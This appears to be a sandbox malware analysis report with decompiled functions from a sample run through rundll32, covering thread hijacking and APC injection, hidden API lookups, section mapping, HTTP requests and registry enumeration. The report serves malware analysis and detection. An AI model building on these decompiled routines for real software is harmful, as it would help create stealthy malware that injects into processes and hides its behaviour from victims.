                            Function 04F6C5C4 Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F6C5E7
                              • Part of subcall function 04F7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,04F6111D,00000000), ref: 04F7214D
                              • Part of subcall function 04F7212C: GetProcAddress.KERNEL32(00000000,?), ref: 04F72166
                              • Part of subcall function 04F7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04F6111D,00000000), ref: 04F72183
                              • Part of subcall function 04F7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,04F6111D,00000000), ref: 04F72194
                              • Part of subcall function 04F7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,04F6111D,00000000), ref: 04F721A7
                            • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,761B4EE0,00000000), ref: 04F6C6A1
                            • WaitForSingleObject.KERNEL32(00000064), ref: 04F6C6AF
                            • SuspendThread.KERNEL32(00000004), ref: 04F6C6C2
                              • Part of subcall function 04F76DE0: memset.NTDLL ref: 04F770AA
                            • ResumeThread.KERNEL32(00000004), ref: 04F6C745
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                            • String ID:
                            • API String ID: 2397206891-0
                            • Opcode ID: 5fd0b1a64bf09c582ac3abb9a56a8cfe98ee42064477240acbf22b02e920b712
                            • Instruction ID: 861c362ba33c9d2ed32a83dec45cfef9b23a6aecaf73cf9f964ed544a9c0136f
                            • Opcode Fuzzy Hash: 5fd0b1a64bf09c582ac3abb9a56a8cfe98ee42064477240acbf22b02e920b712
                            • Instruction Fuzzy Hash: 8B41CF72900248AFEF11AF64CC88AAE7BB9EF04344F04446AE98A96110D735EE52CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75800 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,80000000,00000001,?,04F860C0,00000018,04F64B2B,?,00000201,04F89A24,04F899DC,-0000000C,?), ref: 04F75843
                            • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,04F860C0,00000018,04F64B2B), ref: 04F758CE
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F758F7
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F75915
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                            • String ID:
                            • API String ID: 3666628472-0
                            • Opcode ID: b13b9ecea8d025107db90447ce8273007afc0cd45fbf758798d03b6f675f30c4
                            • Instruction ID: 299bb2d2872634363e3419fd6e4dd3dab7d5777265fa676952fac6e0098cbc1d
                            • Opcode Fuzzy Hash: b13b9ecea8d025107db90447ce8273007afc0cd45fbf758798d03b6f675f30c4
                            • Instruction Fuzzy Hash: 94414C71900709EFDB11DF65C884AAEBBF5FF08310B10951AE825EB650D779BA52CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F78F62 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,04F6C71A,04F6C71A,?,04F76EFA,?,04F6C71A,?,?,00000000), ref: 04F78F87
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FA9
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FBF
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FD5
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FEB
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F79001
                              • Part of subcall function 04F6710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000), ref: 04F67167
                              • Part of subcall function 04F6710A: memset.NTDLL ref: 04F6718B
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 3012371009-0
                            • Opcode ID: 581fef9ca9a2d7761fcb5b694ff1aee5af0253b12e4d1fac3c09319f49bd538c
                            • Instruction ID: 4eca1aca732183cb79860a173725cdad217eba89fe8fcbefd1cf29301709f9fc
                            • Opcode Fuzzy Hash: 581fef9ca9a2d7761fcb5b694ff1aee5af0253b12e4d1fac3c09319f49bd538c
                            • Instruction Fuzzy Hash: 91210CB1A1060AEFE711DF69E845D6ABBECEF04244705846FE505CB251E7B8E9068F60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A144DE Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A144DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04A16D63(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4a1a348; // 0xb1d5a8
					_t1 = _t23 + 0x4a1b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4a1a348; // 0xb1d5a8
					_t2 = _t26 + 0x4a1b761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04A16C2C(_t54);
					} else {
						_t30 =  *0x4a1a348; // 0xb1d5a8
						_t5 = _t30 + 0x4a1b74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4a1a348; // 0xb1d5a8
							_t7 = _t33 + 0x4a1b771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4a1a348; // 0xb1d5a8
								_t9 = _t36 + 0x4a1b4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4a1a348; // 0xb1d5a8
									_t11 = _t39 + 0x4a1b786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04A1190C(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                            0x04a144ed
                            0x04a144f1
                            0x04a145b3
                            0x04a144f7
                            0x04a144f7
                            0x04a144fc
                            0x04a1450f
                            0x04a14511
                            0x04a14516
                            0x04a1451e
                            0x04a14525
                            0x04a14527
                            0x04a1452c
                            0x04a145ab
                            0x04a145ac
                            0x04a1452e
                            0x04a1452e
                            0x04a14533
                            0x04a1453b
                            0x04a1453d
                            0x04a14542
                            0x00000000
                            0x04a14544
                            0x04a14544
                            0x04a14549
                            0x04a14551
                            0x04a14553
                            0x04a14558
                            0x00000000
                            0x04a1455a
                            0x04a1455a
                            0x04a1455f
                            0x04a14567
                            0x04a14569
                            0x04a1456e
                            0x00000000
                            0x04a14570
                            0x04a14570
                            0x04a14575
                            0x04a1457d
                            0x04a1457f
                            0x04a14584
                            0x00000000
                            0x04a14586
                            0x04a1458c
                            0x04a14591
                            0x04a14598
                            0x04a1459d
                            0x04a145a2
                            0x00000000
                            0x04a145a4
                            0x04a145a7
                            0x04a145a7
                            0x04a145a2
                            0x04a14584
                            0x04a1456e
                            0x04a14558
                            0x04a14542
                            0x04a1452c
                            0x04a145c1

                            APIs
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A14046,?,?,?,?,00000000,00000000), ref: 04A14503
                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A14525
                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A1453B
                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A14551
                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A14567
                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A1457D
                              • Part of subcall function 04A1190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,04A1459D), ref: 04A11969
                              • Part of subcall function 04A1190C: memset.NTDLL ref: 04A1198B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 3012371009-0
                            • Opcode ID: 8422b1bd0c2645b96ab2477330037f4b8fe638bc1ab20ade67daae28cedec267
                            • Instruction ID: c176b6259ddf9001f7b3fe13062350b5e28934a87d4cd92e20d8ba7d4ed9161f
                            • Opcode Fuzzy Hash: 8422b1bd0c2645b96ab2477330037f4b8fe638bc1ab20ade67daae28cedec267
                            • Instruction Fuzzy Hash: F62137B560170AAFE711DF69C884E9AB7FCEB58710B054426E946C7230E774FD05CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A16954 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A16954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E04A145C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E04A17AF1(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                            0x04a16954
                            0x04a16961
                            0x04a16963
                            0x04a1696e
                            0x04a16975
                            0x04a169c6
                            0x00000000
                            0x04a169c6
                            0x04a16975
                            0x04a1697b
                            0x04a16982
                            0x04a1698e
                            0x04a16993
                            0x04a169a9
                            0x04a169b9
                            0x00000000
                            0x04a169ab
                            0x04a169ab
                            0x04a169b2
                            0x04a169bf
                            0x04a169bf
                            0x04a169bf
                            0x04a169b2
                            0x04a169a9
                            0x04a169c4
                            0x00000000
                            0x00000000
                            0x04a169ca

                            APIs
                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04A137A0,?,?,761F81D0,00000000), ref: 04A1698E
                            • ResetEvent.KERNEL32(?), ref: 04A16993
                            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04A169A0
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?,?), ref: 04A169AB
                            • GetLastError.KERNEL32(?,?,00000102,04A137A0,?,?,761F81D0,00000000), ref: 04A169C6
                              • Part of subcall function 04A145C4: lstrlen.KERNEL32(00000000,00000008,?,761B4D40,?,?,04A16973,?,?,?,?,00000102,04A137A0,?,?,761F81D0), ref: 04A145D0
                              • Part of subcall function 04A145C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A16973,?,?,?,?,00000102,04A137A0,?), ref: 04A1462E
                              • Part of subcall function 04A145C4: lstrcpy.KERNEL32(00000000,00000000), ref: 04A1463E
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A169B9
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 3739416942-0
                            • Opcode ID: bce7d6918b21518cf11e0bdb40b6f3b3a7eb225a49ad7fb52cc2e417c2eb6e49
                            • Instruction ID: 18fa862bd010342a5c55dfeb6cc36edc7c6d39d51200cfe4b43ec519af44f41a
                            • Opcode Fuzzy Hash: bce7d6918b21518cf11e0bdb40b6f3b3a7eb225a49ad7fb52cc2e417c2eb6e49
                            • Instruction Fuzzy Hash: 9A016971104610ABEB306F75EE44F5BBBA8EF897B5F100A25F592D10F0DB21F809DA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F773AA Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,00000000,04F7893A,04F8A174,04F80998), ref: 04F773C1
                            • QueueUserAPC.KERNEL32(04F7893A,00000000,?,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773D6
                            • GetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773E1
                            • TerminateThread.KERNEL32(00000000,00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773EB
                            • CloseHandle.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773F2
                            • SetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                            • String ID:
                            • API String ID: 3832013932-0
                            • Opcode ID: f91ab3a8fbf151b7c5504fbf962543e583f5687fbd0d16ae37a9dd6d66facc18
                            • Instruction ID: 7a863c4d7359c0d5fc50868e80cd33b6beed30f514ed9367d0e704bb3dc890d5
                            • Opcode Fuzzy Hash: f91ab3a8fbf151b7c5504fbf962543e583f5687fbd0d16ae37a9dd6d66facc18
                            • Instruction Fuzzy Hash: F7F05832604A29BBD7221FA0BC08F6FBFA8FB09759F04940DF60198140C7289C018B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A13472 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E04A13472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x4a1a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E04A161FC( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E04A16F28(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E04A16C2C(_a8);
						goto L29;
					}
					_t64 =  *0x4a1a318; // 0x5539d70
					_t16 = _t64 + 0xc; // 0x5539e92
					_t65 = E04A161FC(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04a190, executed
						_t67 = E04A14822(_t97,  *_t33, _t91, _a8,  *0x4a1a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x4a1a348; // 0xb1d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4a1ba4c; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4a1ba47; // 0x55434b48
								_t69 = _t34;
							}
							_t70 = E04A162F6(_t69,  *0x4a1a3d4,  *0x4a1a3d8,  &_a24,  &_a16); // executed
							if(_t70 == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4a1a348; // 0xb1d5a8
									_t44 = _t71 + 0x4a1b842; // 0x74666f53
									_t73 = E04A161FC(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04a190
										E04A174B6( *_t47, _t91, _a8,  *0x4a1a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d04a190
										E04A174B6( *_t49, _t91, _t99,  *0x4a1a3d0, _a16);
										E04A16C2C(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04a190, executed
									E04A174B6( *_t40, _t91, _a8,  *0x4a1a3d8, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d04a190
									E04A174B6( *_t43, _t91, _a8,  *0x4a1a3d0, _a16);
								}
								if( *_t101 != 0) {
									E04A16C2C(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04a190, executed
					_t81 = E04A112CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04a190
							E04A14822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04A16C2C(_t100);
						_t98 = _a16;
					}
					E04A16C2C(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04A17A1E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4a1a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}


























                            0x04a13472
                            0x04a1347b
                            0x04a13482
                            0x04a13487
                            0x04a134f4
                            0x04a134fa
                            0x04a134ff
                            0x04a13506
                            0x04a1350b
                            0x04a13510
                            0x04a1367b
                            0x04a13682
                            0x04a13682
                            0x04a13687
                            0x04a13689
                            0x04a13689
                            0x04a13692
                            0x04a13692
                            0x04a13516
                            0x04a1351b
                            0x04a13522
                            0x04a13671
                            0x04a13674
                            0x00000000
                            0x04a13674
                            0x04a13528
                            0x04a1352d
                            0x04a13530
                            0x04a13535
                            0x04a1353a
                            0x04a13583
                            0x04a13583
                            0x04a13596
                            0x04a13599
                            0x04a135a0
                            0x04a135a6
                            0x04a135ad
                            0x04a135b7
                            0x04a135b7
                            0x04a135af
                            0x04a135af
                            0x04a135af
                            0x04a135af
                            0x04a135d2
                            0x04a135d9
                            0x04a135e1
                            0x04a1360f
                            0x04a13614
                            0x04a1361b
                            0x04a13620
                            0x04a13624
                            0x04a13656
                            0x04a13626
                            0x04a13633
                            0x04a13636
                            0x04a13646
                            0x04a13649
                            0x04a1364f
                            0x04a1364f
                            0x04a135e3
                            0x04a135f0
                            0x04a135f3
                            0x04a13605
                            0x04a13608
                            0x04a13608
                            0x04a13660
                            0x04a1366c
                            0x04a13662
                            0x04a13665
                            0x04a13665
                            0x04a13660
                            0x04a135d9
                            0x00000000
                            0x04a135a0
                            0x04a13549
                            0x04a1354c
                            0x04a13553
                            0x04a13559
                            0x04a1355c
                            0x04a1355e
                            0x04a1356a
                            0x04a1356d
                            0x04a1356d
                            0x04a13573
                            0x04a13578
                            0x04a13578
                            0x04a1357e
                            0x00000000
                            0x04a1357e
                            0x04a1348c
                            0x00000000
                            0x04a134b3
                            0x04a134b3
                            0x04a134bf
                            0x04a134d2
                            0x04a134d8
                            0x04a134e0
                            0x00000000
                            0x04a134e0

                            APIs
                            • StrChrA.SHLWAPI(04A17168,0000005F,00000000,00000000,00000104), ref: 04A134A5
                            • lstrcpy.KERNEL32(?,?), ref: 04A134D2
                              • Part of subcall function 04A161FC: lstrlen.KERNEL32(?,00000000,05539D70,00000000,04A139E8,05539F93,69B25F44,?,?,?,?,69B25F44,00000005,04A1A00C,4D283A53,?), ref: 04A16203
                              • Part of subcall function 04A161FC: mbstowcs.NTDLL ref: 04A1622C
                              • Part of subcall function 04A161FC: memset.NTDLL ref: 04A1623E
                              • Part of subcall function 04A174B6: lstrlenW.KERNEL32(?,?,?,04A1363B,3D04A190,80000002,04A17168,04A17283,74666F53,4D4C4B48,04A17283,?,3D04A190,80000002,04A17168,?), ref: 04A174DB
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • lstrcpy.KERNEL32(?,00000000), ref: 04A134F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                            • String ID: ($\
                            • API String ID: 3924217599-1512714803
                            • Opcode ID: 1e15f45cbb73abebdb9d4bb5efe10b8b0030d3ba4fbade0bc6e7c1d9dbd99160
                            • Instruction ID: e71edb24d073eef408a9e60b60afd0a13031ba1188446705fccb24354319feef
                            • Opcode Fuzzy Hash: 1e15f45cbb73abebdb9d4bb5efe10b8b0030d3ba4fbade0bc6e7c1d9dbd99160
                            • Instruction Fuzzy Hash: 89515A76500209EFEF229FA0DD40EEB3BBAEF18354F008519FA6596170D735E926EB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A171B6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98registrysynchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A171B6(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E04A16D63(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E04A16C2C(_v28);
							goto L17;
						}
						_t42 = E04A13472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E04A16C2C(_v24);
						_v20 = _v16;
						_t47 = E04A16D63(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x4a1a30c, 0) == 0x102);
				goto L16;
			}

















                            0x04a171b6
                            0x04a171d0
                            0x04a171d3
                            0x04a171d6
                            0x04a171d9
                            0x04a171dc
                            0x04a171e2
                            0x04a171e6
                            0x04a172c0
                            0x04a172c4
                            0x04a172c4
                            0x04a171ef
                            0x04a171f6
                            0x04a171fb
                            0x04a17200
                            0x04a172b5
                            0x04a172b8
                            0x00000000
                            0x04a172be
                            0x04a17206
                            0x04a17209
                            0x04a17210
                            0x04a1721a
                            0x04a17223
                            0x04a17229
                            0x04a17231
                            0x04a17269
                            0x04a172a3
                            0x04a172a9
                            0x04a172ab
                            0x04a172ab
                            0x04a172ad
                            0x04a172b0
                            0x00000000
                            0x04a172b0
                            0x04a1727e
                            0x04a17283
                            0x04a17287
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a17287
                            0x04a17236
                            0x04a17245
                            0x00000000
                            0x00000000
                            0x04a1724a
                            0x04a17253
                            0x04a17256
                            0x04a1725b
                            0x04a17260
                            0x04a1723b
                            0x04a1723b
                            0x00000000
                            0x04a1723b
                            0x04a17264
                            0x00000000
                            0x04a17264
                            0x04a17238
                            0x00000000
                            0x04a17289
                            0x04a17296
                            0x00000000

                            APIs
                            • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04A17168,?), ref: 04A171DC
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • RegEnumKeyExA.KERNEL32(?,?,?,04A17168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04A17168), ref: 04A17223
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,04A17168,?,04A17168,?,?,?,?,?,04A17168,?), ref: 04A17290
                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04A17168,?), ref: 04A172B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
